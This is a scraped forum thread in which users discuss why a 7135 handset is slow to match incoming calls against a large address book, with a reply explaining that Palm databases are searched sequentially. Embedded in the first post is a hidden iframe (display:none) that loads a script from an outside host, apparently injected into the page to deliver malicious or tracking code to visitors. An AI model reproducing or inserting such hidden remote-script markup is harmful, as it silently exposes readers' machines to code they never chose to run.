+ Reply to Thread

CallerID/Address Book Look-up

My 7135 seems to take a long time to look up an incoming call from my address book (4-6 rings), if at all. But, the next time I get a call from the same number, it displays it on the first or second ring. Any ideas as to why the inconsistency and what I could do to speed up displaying the caller's address book link info?

Thanks<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

How many records in your address book? The bigger the book, and the location of that entry will take a while to display. It can also cause the handset to be sluggish in its responsiveness.

Slow Address Book Look-up

997 records, 123K. It seems like it can more quickly "find" names that begin earlier in the alphabet now that I think about it. Does that make sense?

Re: Slow Address Book Look-up

It would indeed make sense as databases on the Palm are not "indexed" in the sense that folks used to desktop databases would be used to. They are sorted into whatever order you have selected, and any search has to be done sequentially until a record is found. And in the case of the address book, there may be up to 5 numbers per entry to look at as well. It is not an efficient process.

Originally posted by toyczar
    997 records, 123K. It seems like it can more quickly "find" names that begin earlier in the alphabet now that I think about it. Does that make sense?